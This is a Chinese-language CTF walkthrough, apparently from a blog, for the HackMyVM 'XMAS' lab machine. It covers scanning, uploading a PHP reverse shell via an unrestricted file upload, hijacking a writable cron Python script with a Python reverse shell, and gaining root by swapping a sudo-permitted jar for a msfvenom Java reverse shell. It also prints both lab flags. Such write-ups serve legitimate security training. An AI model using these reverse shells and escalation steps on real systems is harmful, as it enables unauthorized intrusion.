HackMyVM-XMAS靶机的测试报告

标签：文件 shell 测试报告 jar 192.168 HackMyVM txt root XMAS

目录

一、测试环境

1、系统环境

2、使用工具/软件

二、测试目的

三、操作过程

1、信息搜集

2、Getshell

3、提权

四、结论

---

一、测试环境

1、系统环境

渗透机：kali2021.1(192.168.159.127)

靶  机：ubuntu23.04(192.168.159.158)

注意事项：

①该类型靶场只能在virtualBox上搭建，因此将靶机设置为桥接网络，方便进行渗透。攻击机kali也要桥接出来，不然会出问题。

②靶机启动失败：设置中取消勾选usb即可

​

2、使用工具/软件

Kali: arp-scan(主机探测)、nmap(端口和服务扫描)、gobuster(目录扫描)、nc(获取反弹shell)、python3(开启web服务)、msfconsole(渗透工具)

测试网址：http://christmas.hmv/

靶场介绍：由国外大佬搭建的靶场，类似于vulnhub，经常更新，需要翻墙才能进。

地址：https://hackmyvm.eu/machines/machine.php?vm=XMAS

二、测试目的

熟悉渗透思路，利用不同的文件木马进行提权并获取两个flag。

三、操作过程

1、信息搜集

arp-scan -l

靶机IP：192.168.159.158

物理机IP：192.168.159.241

端口和服务探测

nmap -sT -A -p- -T4 192.168.159.158

靶机开放了22端口(ssh服务)、80端口(web服务)，域名重定向到了http://christmas.hmv

添加hosts地址

echo '192.168.159.158 christmas.hmv' >> /etc/hosts

目录扫描

gobuster dir -u http://christmas.hmv -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt

可以看到靶机是php环境，扫到很多目录，uploads目录格外亮眼

2、Getshell

物理机也需要添加hosts地址才能访问网页

192.168.159.158 christmas.hmv

主页是圣诞节主题的页面，有距离下一个圣诞节的倒计时。

在愿望清单这里有上传文件的地方，并且没做限制，可以直接上传php文件

直接上传一个反弹shell文件，内容如下：

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.159.127/6666 0>&1'"); ?>

上传完成后，可以直接在uploads目录下看到该文件

需要注意的是，该目录上传的文件会定时删除

开启监听即可监听到反弹shell

上传pspy64文件扫描靶机，该工具可以不用root权限查看进程和其他用户执行的命令和cron作业信息

工具地址：GitHub - DominicBreuker/pspy: Monitor linux processes without root permissionsMonitor linux processes without root permissions. Contribute to DominicBreuker/pspy development by creating an account on GitHub.https://github.com/DominicBreuker/pspy

wget 192.168.159.127:8888/pspy64

赋予执行权限并执行

chmod +x pspy64

可以看到uid为1000的用户定时2分钟执行一个python文件

查看/etc/passwd文件，确定该用户为：alabaster

查看运行的python程序，可以看到可以写入该文件，因此可以写入反弹shell来获取文件执行者alabaster的权限

ls -la /opt/NiceOrNaughty/nice_or_naughty.py

写一个反弹shell进去

import socket,subprocess,os


s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(("192.168.159.127",7777))

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)

import pty


pty.spawn("/bin/bash")

用反弹shell文件替换原来的文件

cat nice_or_naughty.py
cp ./nice_or_naughty.py /opt/NiceOrNaughty/nice_or_naughty.py

同时kali开启监听7777端口，等待2分钟定时任务执行即可获取反弹shell

nc -lvvp 7777

在当前目录可以发现user.txt文件

ls
cat user.txt

user.txt: HMV{7bMJ6js7guhQadYDTmBt}

3、提权

查看sudo权限可以发现，可以执行所有命令，但需要密码；不需要密码执行的文件有一个jar文件，可以利用该文件获取root权限反弹shell

使用msf生成jar格式的反弹shell，并替换原本的jar文件

msfvenom -p java/shell_reverse_tcp lhost=192.168.159.127 lport=4444 -f jar > PublishList.jar

靶机下载文件并替换原来的jar包

wget 192.168.159.127:8888/PublishList.jar
cp ./PublishList.jar /home/alabaster/PublishList/PublishList.jar

Msfconsole开启监听

use exploit/multi/handler
set payload java/shell_reverse_tcp
set lhost 192.168.159.127
set lport 4444
run

Sudo执行jar文件，成功监听到root权限的反弹shell

sudo /usr/bin/java -jar /home/alabaster/PublishList/PublishList.jar

在root的家目录下看到了root.txt

SHELL=/bin/bash script -q
cd ~
ls
cat root.txt

root.txt: HMV{GUbM4sBXzvwf7eC9bNL4}

四、结论

熟悉了python和jar格式的反弹shell方法。

标签：文件,shell,测试报告,jar,192.168,HackMyVM,txt,root,XMAS
From： https://blog.csdn.net/2301_79698171/article/details/145153811